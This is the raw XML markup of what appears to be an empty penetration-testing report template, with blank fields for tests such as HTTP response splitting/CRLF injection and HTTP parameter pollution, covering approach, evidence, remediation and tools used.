          <w:p w14:paraId="5D77302C" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F7577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9F7577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C74E2A" w:rsidRPr="009F7577" w14:paraId="3419C9B8" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="262D6147" w14:textId="70717E4E" w:rsidR="00C74E2A" w:rsidRPr="009F7577" w:rsidRDefault="00EA6C6D" w:rsidP="005F105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EA6C6D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>Successful Execution of Uploaded File?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40028A3A" w14:textId="77777777" w:rsidR="00C74E2A" w:rsidRPr="00EA6C6D" w:rsidRDefault="00EA6C6D" w:rsidP="00C74E2A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EA6C6D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[*Yes/No, Impact if successful]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9041A1" w14:textId="77777777" w:rsidR="00EA6C6D" w:rsidRDefault="00EA6C6D" w:rsidP="00C74E2A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  <w:p w14:paraId="277A0297" w14:textId="77777777" w:rsidR="00EA6C6D" w:rsidRDefault="00EA6C6D" w:rsidP="00C74E2A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  <w:p w14:paraId="463C5E16" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00C74E2A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  <w:p w14:paraId="2C209566" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00C74E2A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  <w:p w14:paraId="0048B706" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00C74E2A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  <w:p w14:paraId="62D75B89" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00C74E2A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  <w:p w14:paraId="68DE24A3" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00C74E2A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  <w:p w14:paraId="46408421" w14:textId="2EB694E0" w:rsidR="005F105D" w:rsidRPr="009F7577" w:rsidRDefault="005F105D" w:rsidP="00C74E2A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9F7577" w:rsidRPr="009F7577" w14:paraId="31F6C8F1" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="086B4646" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F7577"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 Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16738D86" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="107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A0919F4" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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A35A265" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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6A3E716" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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8E53480" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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C1BCF91" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F757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F7577" w:rsidRPr="009F7577" w14:paraId="40F74D01" w14:textId="77777777" w:rsidTr="005F105D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3105" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6387822A" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="005F105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F7577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255" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6099836F" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="108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C543507" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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5834979" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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8A69194" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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92BC6D1" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="00EA6C6D">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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F76F08D" w14:textId="77777777" w:rsidR="009F7577" w:rsidRPr="009F7577" w:rsidRDefault="009F7577" w:rsidP="009F757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5E5C6359" w14:textId="77777777" w:rsidR="00F00F8D" w:rsidRPr="00A51A96" w:rsidRDefault="00F00F8D" w:rsidP="00F00F8D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0F8D" w14:paraId="0A085D7F" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="195C3D5A" w14:textId="77777777" w:rsidR="00F00F8D" w:rsidRDefault="00F00F8D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02AA6E61" w14:textId="77777777" w:rsidR="00F00F8D" w:rsidRDefault="00F00F8D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F593A0E" w14:textId="77777777" w:rsidR="00F00F8D" w:rsidRDefault="00F00F8D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D151B7A" w14:textId="77777777" w:rsidR="00F00F8D" w:rsidRDefault="00F00F8D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="390435FE" w14:textId="77777777" w:rsidR="00F00F8D" w:rsidRDefault="00F00F8D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74001D1F" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58D37C04" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="525D5526" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2DCC19D9" w14:textId="77777777" w:rsidR="005F105D" w:rsidRDefault="005F105D" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09DD2141" w14:textId="77777777" w:rsidR="00734B93" w:rsidRDefault="00734B93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1C6CDB" w:rsidRPr="00A51A96" w14:paraId="670C3F83" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="224C6004" w14:textId="1074332D" w:rsidR="001C6CDB" w:rsidRPr="003C713F" w:rsidRDefault="001C6CDB" w:rsidP="00725128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6.4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270FCC" w:rsidRPr="002D0B33">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Perform HTTP Response Splitting/CRLF Injection Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22ADC7FF" w14:textId="77777777" w:rsidR="00F00F8D" w:rsidRPr="0062587A" w:rsidRDefault="00F00F8D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98"/>
        <w:gridCol w:w="3431"/>
        <w:gridCol w:w="3431"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E273CA" w:rsidRPr="00E273CA" w14:paraId="506ECE06" w14:textId="77777777" w:rsidTr="003311D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7AE2C71A" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="003311D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273CA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68FD172B" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273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273CA" w:rsidRPr="00E273CA" w14:paraId="630A16F7" w14:textId="77777777" w:rsidTr="003311D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45E28A41" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="003311D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273CA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1EDEC3CB" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273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273CA" w:rsidRPr="00E273CA" w14:paraId="4BFB7B52" w14:textId="77777777" w:rsidTr="003311D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151FE1DE" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="003311D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273CA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0328B6DA" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273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36DE7" w:rsidRPr="00E273CA" w14:paraId="5E41D09A" w14:textId="77777777" w:rsidTr="003311D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2A93899B" w14:textId="732138E2" w:rsidR="00136DE7" w:rsidRPr="00E273CA" w:rsidRDefault="00136DE7" w:rsidP="003311D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Attack Performed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206F6377" w14:textId="77777777" w:rsidR="00136DE7" w:rsidRDefault="00136DE7" w:rsidP="00E273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1E0878E" w14:textId="77777777" w:rsidR="00136DE7" w:rsidRDefault="00136DE7" w:rsidP="00E273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912B8A0" w14:textId="77777777" w:rsidR="00136DE7" w:rsidRPr="00E273CA" w:rsidRDefault="00136DE7" w:rsidP="00E273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36DE7" w:rsidRPr="00E273CA" w14:paraId="475BDE09" w14:textId="77777777" w:rsidTr="003311D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7E7FBB65" w14:textId="51C78891" w:rsidR="00136DE7" w:rsidRDefault="00136DE7" w:rsidP="003311D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Approach Followed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6E465E25" w14:textId="77777777" w:rsidR="00136DE7" w:rsidRDefault="00136DE7" w:rsidP="00E273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B7A80A7" w14:textId="77777777" w:rsidR="00136DE7" w:rsidRDefault="00136DE7" w:rsidP="00E273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5451C50" w14:textId="1A626381" w:rsidR="00136DE7" w:rsidRDefault="00136DE7" w:rsidP="00E273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273CA" w:rsidRPr="00E273CA" w14:paraId="6555DF9B" w14:textId="77777777" w:rsidTr="003311D3">
        <w:trPr>
          <w:trHeight w:val="1673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09B6E67D" w14:textId="0FE8C229" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="003311D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273CA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CRLF Characters inserted </w:t>
            </w:r>
            <w:r w:rsidR="00DD0CC2" w:rsidRPr="00E273CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>into</w:t>
            </w:r>
            <w:r w:rsidRPr="00E273CA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HTTP Headers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5A986899" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273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5CD0BC3" w14:textId="77777777" w:rsidR="007F33B1" w:rsidRDefault="007F33B1" w:rsidP="00E273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7BD257C" w14:textId="77777777" w:rsidR="007F33B1" w:rsidRDefault="007F33B1" w:rsidP="00E273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1E38318" w14:textId="77777777" w:rsidR="007F33B1" w:rsidRDefault="007F33B1" w:rsidP="00E273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2DED36B" w14:textId="77777777" w:rsidR="007F33B1" w:rsidRDefault="007F33B1" w:rsidP="00E273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8B510E4" w14:textId="77777777" w:rsidR="007F33B1" w:rsidRPr="00E273CA" w:rsidRDefault="007F33B1" w:rsidP="00E273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273CA" w:rsidRPr="00E273CA" w14:paraId="1E928F2E" w14:textId="77777777" w:rsidTr="003311D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2A7022EA" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="003311D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273CA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTTP Response Splitting/CRLF Injection Attack successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AF82A2D" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="702" w:hanging="396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E273CA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431" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D76B88C" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA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E273CA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B2306C" w:rsidRPr="00E273CA" w14:paraId="5E36DA2D" w14:textId="77777777" w:rsidTr="003311D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0D468BCC" w14:textId="139B36A3" w:rsidR="00B2306C" w:rsidRPr="00E273CA" w:rsidRDefault="00B2306C" w:rsidP="003311D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Evidence Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6348A276" w14:textId="77777777" w:rsidR="00B2306C" w:rsidRDefault="00B2306C" w:rsidP="00B2306C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[*If Any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74858C92" w14:textId="77777777" w:rsidR="00B2306C" w:rsidRDefault="00B2306C" w:rsidP="00B2306C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  <w:p w14:paraId="1BF341FA" w14:textId="3C45B0F3" w:rsidR="00B2306C" w:rsidRPr="00E273CA" w:rsidRDefault="00B2306C" w:rsidP="00B2306C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E273CA" w:rsidRPr="00E273CA" w14:paraId="6AA7FF8F" w14:textId="77777777" w:rsidTr="003311D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778B93A7" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="003311D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E273CA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List of Vulnerabilities found while performing HTTP Response Splitting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40AC537F" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="109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E0C0348" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="109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DE6BA53" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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786BB79" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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6D2E913" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10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44448C2" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273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2306C" w:rsidRPr="00E273CA" w14:paraId="1E8ED731" w14:textId="77777777" w:rsidTr="003311D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68F474AB" w14:textId="18AB552B" w:rsidR="00B2306C" w:rsidRPr="00E273CA" w:rsidRDefault="00B2306C" w:rsidP="003311D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Remediation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11172FC1" w14:textId="77777777" w:rsidR="00B2306C" w:rsidRDefault="00B2306C" w:rsidP="00B230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3D0F95A" w14:textId="77777777" w:rsidR="00B2306C" w:rsidRDefault="00B2306C" w:rsidP="00B230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52CB0FF" w14:textId="77777777" w:rsidR="00B2306C" w:rsidRPr="00E273CA" w:rsidRDefault="00B2306C" w:rsidP="00B230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273CA" w:rsidRPr="00E273CA" w14:paraId="43CEA742" w14:textId="77777777" w:rsidTr="003311D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4A03FCEC" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="003311D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273CA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Tools/Services Used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160AB9C3" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="110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4852104" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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250729D" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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349DAE9" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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35FE973" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273CA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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18B9B38" w14:textId="77777777" w:rsidR="00E273CA" w:rsidRPr="00E273CA" w:rsidRDefault="00E273CA" w:rsidP="00E273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53E5D" w:rsidRPr="00E273CA" w14:paraId="47CC95E6" w14:textId="77777777" w:rsidTr="003311D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220D0E06" w14:textId="1A82FBE8" w:rsidR="00A53E5D" w:rsidRPr="00E273CA" w:rsidRDefault="00A53E5D" w:rsidP="003311D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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used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(If any)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2E06BC56" w14:textId="6C0DCD32" w:rsidR="00A53E5D" w:rsidRPr="0004313F" w:rsidRDefault="00A53E5D" w:rsidP="00A53E5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04313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">[*Gemini, </w:t>
            </w:r>
            <w:r w:rsidR="00237098">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ChatGPT</w:t>
            </w:r>
            <w:r w:rsidRPr="0004313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53740CE7" w14:textId="77777777" w:rsidR="00A53E5D" w:rsidRDefault="00A53E5D" w:rsidP="00A53E5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9DFBFC3" w14:textId="77777777" w:rsidR="00A53E5D" w:rsidRPr="00E273CA" w:rsidRDefault="00A53E5D" w:rsidP="00A53E5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53E5D" w:rsidRPr="00E273CA" w14:paraId="44191DAD" w14:textId="77777777" w:rsidTr="003311D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3F0CCB5A" w14:textId="1294432D" w:rsidR="00A53E5D" w:rsidRPr="00357473" w:rsidRDefault="00A53E5D" w:rsidP="003311D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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation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5CE1DA35" w14:textId="77777777" w:rsidR="00A53E5D" w:rsidRDefault="00A53E5D" w:rsidP="00A53E5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F7CFA52" w14:textId="77777777" w:rsidR="00A53E5D" w:rsidRDefault="00A53E5D" w:rsidP="00A53E5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ABB616D" w14:textId="77777777" w:rsidR="00A53E5D" w:rsidRDefault="00A53E5D" w:rsidP="00A53E5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i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F456F32" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00A53E5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i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="497C2593" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00A53E5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i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68E213A9" w14:textId="77777777" w:rsidR="00B04991" w:rsidRPr="0004313F" w:rsidRDefault="00B04991" w:rsidP="00A53E5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i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A53E5D" w:rsidRPr="00E273CA" w14:paraId="357B188F" w14:textId="77777777" w:rsidTr="003311D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1A195592" w14:textId="4E69E3C4" w:rsidR="00A53E5D" w:rsidRPr="00357473" w:rsidRDefault="00A53E5D" w:rsidP="003311D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2C3A18B0" w14:textId="77777777" w:rsidR="00A53E5D" w:rsidRDefault="00A53E5D" w:rsidP="00A53E5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FC23623" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00A53E5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D42E460" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00A53E5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88E7A0D" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00A53E5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218D0B2" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00A53E5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8F476B6" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00A53E5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1C28E6B5" w14:textId="77777777" w:rsidR="004E09BB" w:rsidRPr="00A51A96" w:rsidRDefault="004E09BB" w:rsidP="004E09BB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09BB" w14:paraId="4DBA200A" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68277C20" w14:textId="77777777" w:rsidR="004E09BB" w:rsidRDefault="004E09BB" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DD1D7AD" w14:textId="77777777" w:rsidR="004E09BB" w:rsidRDefault="004E09BB" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="064BF1F3" w14:textId="77777777" w:rsidR="004E09BB" w:rsidRDefault="004E09BB" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A8DB28C" w14:textId="77777777" w:rsidR="004E09BB" w:rsidRDefault="004E09BB" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43E2E9A9" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BA526EB" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BBDA5FF" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7265494C" w14:textId="77777777" w:rsidR="00B04991" w:rsidRDefault="00B04991" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19077257" w14:textId="77777777" w:rsidR="004E09BB" w:rsidRDefault="004E09BB" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78327C0A" w14:textId="77777777" w:rsidR="00005D22" w:rsidRDefault="00005D22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DD0CC2" w:rsidRPr="00A51A96" w14:paraId="7BA18D98" w14:textId="77777777" w:rsidTr="00430DBD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7B941975" w14:textId="7310E36A" w:rsidR="00DD0CC2" w:rsidRPr="003C713F" w:rsidRDefault="00DD0CC2" w:rsidP="00725128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6.5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401D00" w:rsidRPr="00401D00">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for HTTP Parameter Pollution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BBD6338" w14:textId="77777777" w:rsidR="00DD0CC2" w:rsidRPr="002944A1" w:rsidRDefault="00DD0CC2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58"/>
        <w:gridCol w:w="6502"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F59FE" w:rsidRPr="00C747D8" w14:paraId="1196C3E1" w14:textId="77777777" w:rsidTr="00533881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7A0D678C" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="0053388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47D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502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4A5473" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE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F59FE" w:rsidRPr="00C747D8" w14:paraId="0DC2C7F1" w14:textId="77777777" w:rsidTr="00533881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5FE54B34" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="0053388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47D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502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A82FA21" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE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F59FE" w:rsidRPr="00C747D8" w14:paraId="57D26C96" w14:textId="77777777" w:rsidTr="00533881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047D1716" w14:textId="77777777" w:rsidR="003F59FE" w:rsidRPr="00C747D8" w:rsidRDefault="003F59FE" w:rsidP="0053388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47D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502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
